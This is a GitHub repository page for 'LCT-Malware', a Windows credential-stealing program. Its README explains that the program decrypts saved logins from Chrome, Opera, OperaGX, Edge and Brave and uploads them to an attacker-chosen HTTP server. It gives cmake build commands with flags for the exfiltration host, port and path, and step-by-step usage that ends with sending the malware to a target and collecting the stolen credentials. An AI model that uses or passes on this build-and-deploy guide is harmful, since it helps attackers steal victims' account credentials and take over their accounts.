Skip to content

iHapiW/LCT-Malware

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

37 Commits
include
include
 
 
lib
lib
 
 
resource
resource
 
 
src
src
 
 
.gitignore
.gitignore
 
 
CMakeLists.txt
CMakeLists.txt
 
 
Config.h.in
Config.h.in
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

About Project

The purpose of the LCT-Malware ( Login Credentials Theif - Malicious Software ) is to dump target's login credentials that has been saved in the browsers' databases, and upload them in attacker's server.

It follows the decryption process in the victim's system ( as some decryption functions depend on the victim's system ). Then it checks the connection between attacker and the victim, to see if the server is available. if somehow the server didn't respond to the attacker, it will go to "Busy Sleep" until the server become available again.

Note: The Current Version of Malware ONLY Runs in Windows Systems

Target Browsers of Malware

  • Chrome
  • Opera
  • OperaGX
  • Microsoft Edge
  • Brave

Dependencies

Runtime Dependencies:

  • Windows API ( Baked into every victim's system )
  • LibSodium ( Specified by the program )
  • Sqlite3 ( Specified by the program )

Note: So you dont need to play around with dependencies as they are always available

Build Dependencies:

  • CMake
  • Windows Compiler

Configuration

Installing Build Dependencies in Debian Based OS:

sudo apt install binutils-mingw-w64-x86-64 gcc-mingw-w64-x86-64-win32 gcc-mingw-w64-base mingw-w64-common mingw-w64-x86-64-dev

Installing Build Dependencies in Arch Based OS:

sudo pacman -S mingw-w64-binutils mingw-w64-crt mingw-w64-gcc mingw-w64-headers mingw-w64-winpthreads

Project Configuration Flags:

  • -DHOSTNAME
  • -DPORT
  • -DPATH

HOSTNAME can be either IP or Hostname, this specifies the address that malware is going to send the dumped login credentials.
PORT specifies HTTP port on the reciever's system. ( by Default 80 )
PATH specifies the Path of them reciever's HTTP Server. ( by default "/" )

for example this configuration:

cmake -Bbuild -DHOSTNAME="192.168.1.1" -DPORT=5656 -DPATH=/app

will upload credentials to this location: http://192.168.1.1:5656/app

Note: -B flag specifies build directory

Usage

1.install build dependencies with the instructions above.
2.then configure project with your system ( or maybe your server )
3.build the project using following command:

cmake --build {BuildDir}

Note: replace the {BuildDir} with your Build Directory

4.Start your listener in your system ( or maybe your server )
Note: The Listener should look for 'document' part of the POST form to recieve file
5.then send the malware to your target.
6.Wait for execution and receive delicious information :)

Contributors

  • iHapiW

About

Login Credential Thief Malware

Topics

c cmake credentials login malware lct

Resources

Readme

License

MIT license
Activity

Stars

8 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases 3

Uploader Version Release Latest
May 27, 2023
+ 2 releases

Languages